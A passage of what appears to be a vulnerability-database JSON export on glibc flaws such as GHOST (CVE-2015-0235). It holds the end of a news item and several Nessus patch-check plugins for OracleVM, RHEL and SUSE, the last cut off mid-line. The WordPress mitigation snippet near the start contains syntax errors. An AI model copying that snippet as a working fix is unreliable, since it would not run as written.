\n\n\n> _add_filter( 'xmlrpc_methods' , function( $methods' ) { unset( $methods[ 'pingback.ping ] ); return $methods; } );_\n", "cvss3": {}, "published": "2015-01-29T23:53:00", "type": "thn", "title": "GHOST glibc Vulnerability Affects WordPress and PHP applications", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2015-01-30T10:53:39", "id": "THN:3DD8F9ADFFEB290F33825414D41B0F41", "href": "https://thehackernews.com/2015/01/ghost-linux-security-vulnerability_29.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-09-11T01:29:32", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Update fix for CVE-2015-7547 (#1296028).\n\n - Create helper threads with enough stack for POSIX AIO and timers (#1301625).\n\n - Fix CVE-2015-7547: getaddrinfo stack-based buffer overflow (#1296028).\n\n - Support loading more libraries with static TLS (#1291270).\n\n - Check for NULL arena pointer in _int_pvalloc (#1256890).\n\n - Don't change no_dyn_threshold on mallopt failure (#1256891).\n\n - Unlock main arena after allocation in calloc (#1256812).\n\n - Enable robust malloc change again (#1256812).\n\n - Fix perturbing in malloc on free and simply perturb_byte (#1256812).\n\n - Don't fall back to mmap prematurely (#1256812).\n\n - The malloc deadlock avoidance support has been temporarily removed since it triggers deadlocks in certain applications (#1244002).\n\n - Fix ruserok check to reject, not skip, negative user checks (#1217186).\n\n - Optimize ruserok function for large ~/.rhosts (#1217186).\n\n - Fix crash in valloc due to the backtrace deadlock fix (#1207236).\n\n - Fix buffer overflow in gethostbyname_r with misaligned buffer (#1209376, CVE-2015-1781).\n\n - Avoid deadlock in malloc on backtrace (#1066724).\n\n - Support running applications that use Intel AVX-512 (#1195453).\n\n - Silence logging of record type mismatch for DNSSEC records (#1088301).\n\n - Shrink heap on free when vm.overcommit_memory == 2 (#867679).\n\n - Enhance nscd to detect any configuration file changes (#859965).\n\n - Fix __times handling of EFAULT when buf is NULL (#1124204).\n\n - Fix memory leak with dlopen and thread-local storage variables (#978098).\n\n - Prevent getaddrinfo from writing DNS queries to random fd (CVE-2013-7423, - Implement userspace half of in6.h header coordination (#1053178).\n\n - Correctely size relocation cache used by profiler (#1144132).\n\n - Fix reuse of cached stack leading to bounds overrun of DTV (#1116050).\n\n - Return failure in getnetgrent only when all netgroups have been searched (#1085312).\n\n - Fix valgrind warning in nscd_stats (#1091915).\n\n - Initialize xports array (#1159167).\n\n - Fix tst-default-attr test to not fail on powerpc (#1023306).\n\n - Fix parsing of numeric hosts in gethostbyname_r (CVE-2015-0235, #1183534).\n\n - Fix typo in nscd/selinux.c (#1125307).\n\n - Actually run test-iconv modules (#1176907).\n\n - Fix recursive dlopen (#1154563).\n\n - Fix crashes on invalid input in IBM gconv modules (CVE-2014-6040, #1172044).\n\n - Fix wordexp to honour WRDE_NOCMD (CVE-2014-7817, #1171296).\n\n - Fix typo in res_send and res_query (#rh1138769).", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "type": "nessus", "title": "OracleVM 3.3 : glibc (OVMSA-2016-0013) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7423", "CVE-2014-6040", "CVE-2014-7817", "CVE-2015-0235", "CVE-2015-1781", "CVE-2015-7547"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:glibc", "p-cpe:/a:oracle:vm:glibc-common", "p-cpe:/a:oracle:vm:nscd", "cpe:/o:oracle:vm_server:3.3"], "id": "ORACLEVM_OVMSA-2016-0013.NASL", "href": "https://www.tenable.com/plugins/nessus/88783", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0013.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88783);\n script_version(\"2.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-7423\", \"CVE-2014-6040\", \"CVE-2014-7817\", \"CVE-2015-0235\", \"CVE-2015-1781\", \"CVE-2015-7547\");\n script_bugtraq_id(69472, 71216, 72325, 72844, 74255);\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n\n script_name(english:\"OracleVM 3.3 : glibc (OVMSA-2016-0013) (GHOST)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Update fix for CVE-2015-7547 (#1296028).\n\n - Create helper threads with enough stack for POSIX AIO\n and timers (#1301625).\n\n - Fix CVE-2015-7547: getaddrinfo stack-based buffer\n overflow (#1296028).\n\n - Support loading more libraries with static TLS\n (#1291270).\n\n - Check for NULL arena pointer in _int_pvalloc (#1256890).\n\n - Don't change no_dyn_threshold on mallopt failure\n (#1256891).\n\n - Unlock main arena after allocation in calloc (#1256812).\n\n - Enable robust malloc change again (#1256812).\n\n - Fix perturbing in malloc on free and simply perturb_byte\n (#1256812).\n\n - Don't fall back to mmap prematurely (#1256812).\n\n - The malloc deadlock avoidance support has been\n temporarily removed since it triggers deadlocks in\n certain applications (#1244002).\n\n - Fix ruserok check to reject, not skip, negative user\n checks (#1217186).\n\n - Optimize ruserok function for large ~/.rhosts\n (#1217186).\n\n - Fix crash in valloc due to the backtrace deadlock fix\n (#1207236).\n\n - Fix buffer overflow in gethostbyname_r with misaligned\n buffer (#1209376, CVE-2015-1781).\n\n - Avoid deadlock in malloc on backtrace (#1066724).\n\n - Support running applications that use Intel AVX-512\n (#1195453).\n\n - Silence logging of record type mismatch for DNSSEC\n records (#1088301).\n\n - Shrink heap on free when vm.overcommit_memory == 2\n (#867679).\n\n - Enhance nscd to detect any configuration file changes\n (#859965).\n\n - Fix __times handling of EFAULT when buf is NULL\n (#1124204).\n\n - Fix memory leak with dlopen and thread-local storage\n variables (#978098).\n\n - Prevent getaddrinfo from writing DNS queries to random\n fd (CVE-2013-7423, - Implement userspace half of in6.h\n header coordination (#1053178).\n\n - Correctely size relocation cache used by profiler\n (#1144132).\n\n - Fix reuse of cached stack leading to bounds overrun of\n DTV (#1116050).\n\n - Return failure in getnetgrent only when all netgroups\n have been searched (#1085312).\n\n - Fix valgrind warning in nscd_stats (#1091915).\n\n - Initialize xports array (#1159167).\n\n - Fix tst-default-attr test to not fail on powerpc\n (#1023306).\n\n - Fix parsing of numeric hosts in gethostbyname_r\n (CVE-2015-0235, #1183534).\n\n - Fix typo in nscd/selinux.c (#1125307).\n\n - Actually run test-iconv modules (#1176907).\n\n - Fix recursive dlopen (#1154563).\n\n - Fix crashes on invalid input in IBM gconv modules\n (CVE-2014-6040, #1172044).\n\n - Fix wordexp to honour WRDE_NOCMD (CVE-2014-7817,\n #1171296).\n\n - Fix typo in res_send and res_query (#rh1138769).\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-February/000418.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?92d5b0bd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc / glibc-common / nscd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"glibc-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"glibc-common-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"nscd-2.12-1.166.el6_7.7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / nscd\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-04T02:35:46", "description": "An update for glibc is now available for Red Hat Enterprise Linux 6.5 Advanced Update Support.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the name service cache daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nSecurity Fix(es) :\n\n* It was discovered that, under certain circumstances, glibc's getaddrinfo() function would send DNS queries to random file descriptors. An attacker could potentially use this flaw to send DNS queries to unintended recipients, resulting in information disclosure or data loss due to the application encountering corrupted data.\n(CVE-2013-7423)", "cvss3": {"score": null, "vector": null}, "published": "2016-06-07T00:00:00", "type": "nessus", "title": "RHEL 6 : glibc (RHSA-2016:1207)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7423"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-static", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:6.5"], "id": "REDHAT-RHSA-2016-1207.NASL", "href": "https://www.tenable.com/plugins/nessus/91497", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:1207. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91497);\n script_version(\"2.9\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2013-7423\");\n script_xref(name:\"RHSA\", value:\"2016:1207\");\n\n script_name(english:\"RHEL 6 : glibc (RHSA-2016:1207)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for glibc is now available for Red Hat Enterprise Linux 6.5\nAdvanced Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nname service cache daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nSecurity Fix(es) :\n\n* It was discovered that, under certain circumstances, glibc's\ngetaddrinfo() function would send DNS queries to random file\ndescriptors. An attacker could potentially use this flaw to send DNS\nqueries to unintended recipients, resulting in information disclosure\nor data loss due to the application encountering corrupted data.\n(CVE-2013-7423)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:1207\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-7423\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6\\.5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.5\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:1207\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-2.12-1.132.el6_5.8\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-2.12-1.132.el6_5.8\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.8\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.8\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.8\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.8\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.8\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.132.el6_5.8\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.132.el6_5.8\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.8\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-static-2.12-1.132.el6_5.8\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.132.el6_5.8\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.8\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.8\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-04T02:48:11", "description": "This collective update for the GNU C library (glibc) provides the following fixes :\n\n - Fix stack overflow in getaddrinfo with many results (bnc#813121, CVE-2013-1914)\n\n - Fix locking in _IO_cleanup (bnc#796982)\n\n - Fix buffer overflow in glob (bnc#691365)\n\n - Fix memory leak in execve (bnc#805899)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-20T00:00:00", "type": "nessus", "title": "SUSE SLED10 / SLES10 Security Update : glibc (SUSE-SU-2013:0858-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1914"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:glibc", "p-cpe:/a:novell:suse_linux:glibc-devel", "p-cpe:/a:novell:suse_linux:glibc-html", "p-cpe:/a:novell:suse_linux:glibc-i18ndata", "p-cpe:/a:novell:suse_linux:glibc-info", "p-cpe:/a:novell:suse_linux:glibc-locale", "p-cpe:/a:novell:suse_linux:glibc-profile", "p-cpe:/a:novell:suse_linux:nscd", "cpe:/o:novell:suse_linux:10"], "id": "SUSE_SU-2013-0858-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83588", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2013:0858-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83588);\n script_version(\"2.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-1914\");\n script_bugtraq_id(58839);\n\n script_name(english:\"SUSE SLED10 / SLES10 Security Update : glibc (SUSE-SU-2013:0858-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This collective update for the GNU C library (glibc) provides the\nfollowing fixes :\n\n - Fix stack overflow in getaddrinfo with many results\n (bnc#813121, CVE-2013-1914)\n\n - Fix locking in _IO_cleanup (bnc#796982)\n\n - Fix buffer overflow in glob (bnc#691365)\n\n - Fix memory leak in execve (bnc#805899)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://download.suse.com/patch/finder/?keywords=4ca050db7cee063070fd004b2b257e13\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2dfbe98d\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1914.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/691365\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/796982\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/805899\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/810637\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/813121\"\n );\n # https://www.suse.com/support/update/announcement/2013/suse-su-20130858-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f7edf911\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glibc packages\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLED10|SLES10)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED10 / SLES10\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED10\" && (! ereg(pattern:\"^4$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED10 SP4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLES10\" && (! ereg(pattern:\"^4$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES10 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-devel-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-html-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-i18ndata-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-info-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-locale-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", 